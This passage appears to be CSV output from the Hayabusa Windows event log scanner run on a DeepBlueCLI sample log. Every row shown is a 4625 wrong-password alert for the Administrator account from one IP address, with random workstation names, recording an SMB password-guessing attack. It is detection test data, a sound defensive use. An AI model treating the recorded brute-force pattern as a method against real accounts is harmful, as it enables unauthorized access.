NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.733 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0gwEDgRF2wUgTDAy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.780 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I9Q2GSALfiuEbulo : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.824 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DKTja76Qe9vSjrdN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.868 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DXXuUyKlvaOgMNSu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.904 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: X3qdEQReXwHAZUS8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.965 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FqtfHJKOfmWXEd4s : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.021 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mVv7vete3uXixggi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:32.060 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0PF6E3wRP0Tk39ss : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.106 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: touwF4IXUahG7jvJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.161 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lMOi7rygc7SJ5TPQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.208 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QjM1K5eFSA9U37oE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.258 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HgzyZqFU9v2kDVvG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.301 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hJeVj2h0sBxwBuGv : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.355 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FNXI8b6Zcj1zU3JY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.408 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: q9DyH9oxFbRTCQ80 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.458 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5LZo1ljGLOVKhwcC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.556 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GvY6Q7RGKwjehARC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.600 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uKLrHVMevqniTck8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:32.645 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ldxglvKFhLJQ3FV3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.685 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lRHIAxIj9wFRIg67 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.725 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Mc7nvfyDfWpnhhBx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.768 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NB7Y4gPbxose5TsQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.806 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yKFU6DJ8Wdtp2qdC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.841 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YlbxRctdClWIOjss : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.886 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LToi5ANf3tUteu4h : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.932 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 52YPmYviVPBqJ39Y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.985 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JpzKsyxEKNLd8l1u : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.037 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: r0vd6xEFevamX3jF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.089 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WR9gJBoN1ra4NI2M : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:33.136 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rGYNVrDBIpMBu9GT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.186 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 57qCysbeaXx12CbY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.229 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xyJl4mHvgtTv53d9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.275 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jGBDZCtot2ogcKIO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.305 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bBhmbqZIi1gX62mM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.348 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: o7d4bcBJV1jlRgdt : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.397 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FtfFb6hMHJiFXxai : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.441 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: frlsZMDcdb5WaW99 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.484 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CFV8UiUTRCCfab9l : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.537 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZI8P6ZeVRmQlbGtz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.572 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UmJI7S1nj5hfWZqv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:33.624 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: veh8XInSzXe8E9UD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.669 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: a1BuBHLILZ4afwJC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.721 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NN2h7CHnGSCQZXan : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.758 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BU3fxfM1qGBJ55HS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.802 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q1OlBmhUABabDQbN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.848 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6DgQtHG7cT05kRXd : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.890 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EUTe3JqVWgDcDcOS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.933 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nGKgUOyX3USQlESB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.978 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rcIJ8keQvgax1SuL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.025 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: A7jsyA7bWtVf4sLr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.065 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mijnM28fwbgWzkvp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:34.115 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: o6dNmJo7vkacqxA6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.155 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FxvD2OWtadDT1Q2c : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.185 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WK8Esc50KVWIsLU5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.244 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: U07NeCzXSdx5Nlgs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.292 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tObVl72GJse2HCGp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.335 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nbEnp2E5a3N78OBC : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.389 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IlRmyinJLWwj5yQg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.438 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 92H7tdXinUOxtOLV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.493 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Za42EUNuitIXaMBo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.547 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kz7OtswOreS0fdeS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.608 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VMxY1IHx5VuvskM7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:34.667 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: d6uxMqLCcqHkuesV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.721 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TmeAWYvFEbqJp1rt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.826 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8tGAdT1CBRYRatVA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.925 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: K0h9ulMPWtj8bEKI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.052 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eLyLMNv6cOp3sgrq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.098 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KIAOs16X8nFxV45x : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.150 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Z4EbyEaUxUEyuiY6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.200 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SDnW5GABBLbe6eZ7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.258 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GublgQLD3RXQNmkX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.301 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2BQRppHTUHAoWPe4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.352 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gnh6HFlIW1zWEBu5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
